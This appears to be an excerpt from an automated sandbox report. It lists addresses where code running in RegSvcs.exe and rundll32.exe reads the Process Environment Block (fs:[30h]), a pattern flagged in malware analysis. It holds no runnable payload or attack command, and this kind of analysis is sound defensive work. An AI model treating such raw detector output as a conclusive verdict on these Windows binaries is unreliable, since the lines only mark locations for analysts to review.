Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F44BAD mov eax, dword ptr fs:[00000030h]	5_2_00F44BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE5BA5 mov eax, dword ptr fs:[00000030h]	5_2_00FE5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F42397 mov eax, dword ptr fs:[00000030h]	5_2_00F42397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4B390 mov eax, dword ptr fs:[00000030h]	5_2_00F4B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD138A mov eax, dword ptr fs:[00000030h]	5_2_00FD138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FCD380 mov ecx, dword ptr fs:[00000030h]	5_2_00FCD380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F21B8F mov eax, dword ptr fs:[00000030h]	5_2_00F21B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F21B8F mov eax, dword ptr fs:[00000030h]	5_2_00F21B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F43B7A mov eax, dword ptr fs:[00000030h]	5_2_00F43B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F43B7A mov eax, dword ptr fs:[00000030h]	5_2_00F43B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1DB60 mov ecx, dword ptr fs:[00000030h]	5_2_00F1DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE8B58 mov eax, dword ptr fs:[00000030h]	5_2_00FE8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1F358 mov eax, dword ptr fs:[00000030h]	5_2_00F1F358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1DB40 mov eax, dword ptr fs:[00000030h]	5_2_00F1DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD131B mov eax, dword ptr fs:[00000030h]	5_2_00FD131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD14FB mov eax, dword ptr fs:[00000030h]	5_2_00FD14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]	5_2_00F96CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]	5_2_00F96CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]	5_2_00F96CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE8CD6 mov eax, dword ptr fs:[00000030h]	5_2_00FE8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2849B mov eax, dword ptr fs:[00000030h]	5_2_00F2849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F3746D mov eax, dword ptr fs:[00000030h]	5_2_00F3746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FAC450 mov eax, dword ptr fs:[00000030h]	5_2_00FAC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FAC450 mov eax, dword ptr fs:[00000030h]	5_2_00FAC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4A44B mov eax, dword ptr fs:[00000030h]	5_2_00F4A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4BC2C mov eax, dword ptr fs:[00000030h]	5_2_00F4BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]	5_2_00FE740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]	5_2_00FE740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]	5_2_00FE740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]	5_2_00F96C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]	5_2_00F96C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]	5_2_00F96C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]	5_2_00F96C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]	5_2_00FD1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]	5_2_00FD1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]	5_2_00FD1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]	5_2_00FD1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]	5_2_00FD1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]	5_2_00FD1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]	5_2_00FD1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]	5_2_00FD1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]	5_2_00FD1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]	5_2_00FD1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]	5_2_00FD1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]	5_2_00FD1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]	5_2_00FD1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]	5_2_00FD1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FC8DF1 mov eax, dword ptr fs:[00000030h]	5_2_00FC8DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]	5_2_00F2D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]	5_2_00F2D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]	5_2_00FDFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]	5_2_00FDFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]	5_2_00FDFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]	5_2_00FDFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F96DC9 mov eax, dword ptr fs:[00000030h]	5_2_00F96DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F96DC9 mov eax, dword ptr fs:[00000030h]	5_2_00F96DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F96DC9 mov eax, dword ptr fs:[00000030h]	5_2_00F96DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F96DC9 mov ecx, dword ptr fs:[00000030h]	5_2_00F96DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F96DC9 mov eax, dword ptr fs:[00000030h]	5_2_00F96DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F96DC9 mov eax, dword ptr fs:[00000030h]	5_2_00F96DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]	5_2_00F41DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]	5_2_00F41DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]	5_2_00F41DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE05AC mov eax, dword ptr fs:[00000030h]	5_2_00FE05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE05AC mov eax, dword ptr fs:[00000030h]	5_2_00FE05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F435A1 mov eax, dword ptr fs:[00000030h]	5_2_00F435A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4FD9B mov eax, dword ptr fs:[00000030h]	5_2_00F4FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4FD9B mov eax, dword ptr fs:[00000030h]	5_2_00F4FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F42581 mov eax, dword ptr fs:[00000030h]	5_2_00F42581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F42581 mov eax, dword ptr fs:[00000030h]	5_2_00F42581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F42581 mov eax, dword ptr fs:[00000030h]	5_2_00F42581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F42581 mov eax, dword ptr fs:[00000030h]	5_2_00F42581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]	5_2_00F12D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]	5_2_00F12D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]	5_2_00F12D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]	5_2_00F12D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]	5_2_00F12D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F3C577 mov eax, dword ptr fs:[00000030h]	5_2_00F3C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F3C577 mov eax, dword ptr fs:[00000030h]	5_2_00F3C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F37D50 mov eax, dword ptr fs:[00000030h]	5_2_00F37D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F53D43 mov eax, dword ptr fs:[00000030h]	5_2_00F53D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F93540 mov eax, dword ptr fs:[00000030h]	5_2_00F93540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1AD30 mov eax, dword ptr fs:[00000030h]	5_2_00F1AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FDE539 mov eax, dword ptr fs:[00000030h]	5_2_00FDE539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]	5_2_00F23D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]	5_2_00F23D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]	5_2_00F23D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]	5_2_00F23D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]	5_2_00F23D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]	5_2_00F23D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]	5_2_00F23D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]	5_2_00F23D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]	5_2_00F23D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]	5_2_00F23D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]	5_2_00F23D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]	5_2_00F23D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]	5_2_00F23D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE8D34 mov eax, dword ptr fs:[00000030h]	5_2_00FE8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F9A537 mov eax, dword ptr fs:[00000030h]	5_2_00F9A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]	5_2_00F44D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]	5_2_00F44D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]	5_2_00F44D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F276E2 mov eax, dword ptr fs:[00000030h]	5_2_00F276E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F416E0 mov ecx, dword ptr fs:[00000030h]	5_2_00F416E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE8ED6 mov eax, dword ptr fs:[00000030h]	5_2_00FE8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F58EC7 mov eax, dword ptr fs:[00000030h]	5_2_00F58EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F436CC mov eax, dword ptr fs:[00000030h]	5_2_00F436CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FCFEC0 mov eax, dword ptr fs:[00000030h]	5_2_00FCFEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE0EA5 mov eax, dword ptr fs:[00000030h]	5_2_00FE0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE0EA5 mov eax, dword ptr fs:[00000030h]	5_2_00FE0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE0EA5 mov eax, dword ptr fs:[00000030h]	5_2_00FE0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F946A7 mov eax, dword ptr fs:[00000030h]	5_2_00F946A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FAFE87 mov eax, dword ptr fs:[00000030h]	5_2_00FAFE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F3AE73 mov eax, dword ptr fs:[00000030h]	5_2_00F3AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F3AE73 mov eax, dword ptr fs:[00000030h]	5_2_00F3AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F3AE73 mov eax, dword ptr fs:[00000030h]	5_2_00F3AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F3AE73 mov eax, dword ptr fs:[00000030h]	5_2_00F3AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F3AE73 mov eax, dword ptr fs:[00000030h]	5_2_00F3AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2766D mov eax, dword ptr fs:[00000030h]	5_2_00F2766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F27E41 mov eax, dword ptr fs:[00000030h]	5_2_00F27E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F27E41 mov eax, dword ptr fs:[00000030h]	5_2_00F27E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F27E41 mov eax, dword ptr fs:[00000030h]	5_2_00F27E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F27E41 mov eax, dword ptr fs:[00000030h]	5_2_00F27E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F27E41 mov eax, dword ptr fs:[00000030h]	5_2_00F27E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F27E41 mov eax, dword ptr fs:[00000030h]	5_2_00F27E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FDAE44 mov eax, dword ptr fs:[00000030h]	5_2_00FDAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FDAE44 mov eax, dword ptr fs:[00000030h]	5_2_00FDAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FCFE3F mov eax, dword ptr fs:[00000030h]	5_2_00FCFE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1E620 mov eax, dword ptr fs:[00000030h]	5_2_00F1E620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4A61C mov eax, dword ptr fs:[00000030h]	5_2_00F4A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4A61C mov eax, dword ptr fs:[00000030h]	5_2_00F4A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1C600 mov eax, dword ptr fs:[00000030h]	5_2_00F1C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1C600 mov eax, dword ptr fs:[00000030h]	5_2_00F1C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1C600 mov eax, dword ptr fs:[00000030h]	5_2_00F1C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F48E00 mov eax, dword ptr fs:[00000030h]	5_2_00F48E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD1608 mov eax, dword ptr fs:[00000030h]	5_2_00FD1608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F537F5 mov eax, dword ptr fs:[00000030h]	5_2_00F537F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F28794 mov eax, dword ptr fs:[00000030h]	5_2_00F28794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F97794 mov eax, dword ptr fs:[00000030h]	5_2_00F97794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F97794 mov eax, dword ptr fs:[00000030h]	5_2_00F97794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F97794 mov eax, dword ptr fs:[00000030h]	5_2_00F97794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2FF60 mov eax, dword ptr fs:[00000030h]	5_2_00F2FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE8F6A mov eax, dword ptr fs:[00000030h]	5_2_00FE8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2EF40 mov eax, dword ptr fs:[00000030h]	5_2_00F2EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4E730 mov eax, dword ptr fs:[00000030h]	5_2_00F4E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F14F2E mov eax, dword ptr fs:[00000030h]	5_2_00F14F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F14F2E mov eax, dword ptr fs:[00000030h]	5_2_00F14F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F3F716 mov eax, dword ptr fs:[00000030h]	5_2_00F3F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FAFF10 mov eax, dword ptr fs:[00000030h]	5_2_00FAFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FAFF10 mov eax, dword ptr fs:[00000030h]	5_2_00FAFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE070D mov eax, dword ptr fs:[00000030h]	5_2_00FE070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE070D mov eax, dword ptr fs:[00000030h]	5_2_00FE070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4A70E mov eax, dword ptr fs:[00000030h]	5_2_00F4A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4A70E mov eax, dword ptr fs:[00000030h]	5_2_00F4A70E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04F958EC mov eax, dword ptr fs:[00000030h]	15_2_04F958EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_05068D34 mov eax, dword ptr fs:[00000030h]	15_2_05068D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0501A537 mov eax, dword ptr fs:[00000030h]	15_2_0501A537
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_05013540 mov eax, dword ptr fs:[00000030h]	15_2_05013540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FCF0BF mov ecx, dword ptr fs:[00000030h]	15_2_04FCF0BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FCF0BF mov eax, dword ptr fs:[00000030h]	15_2_04FCF0BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FCF0BF mov eax, dword ptr fs:[00000030h]	15_2_04FCF0BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD90AF mov eax, dword ptr fs:[00000030h]	15_2_04FD90AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04FC20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04FC20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04FC20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04FC20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04FC20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04FC20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FA849B mov eax, dword ptr fs:[00000030h]	15_2_04FA849B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04F99080 mov eax, dword ptr fs:[00000030h]	15_2_04F99080
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FB746D mov eax, dword ptr fs:[00000030h]	15_2_04FB746D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_050169A6 mov eax, dword ptr fs:[00000030h]	15_2_050169A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_050605AC mov eax, dword ptr fs:[00000030h]	15_2_050605AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_050605AC mov eax, dword ptr fs:[00000030h]	15_2_050605AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FB0050 mov eax, dword ptr fs:[00000030h]	15_2_04FB0050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FB0050 mov eax, dword ptr fs:[00000030h]	15_2_04FB0050
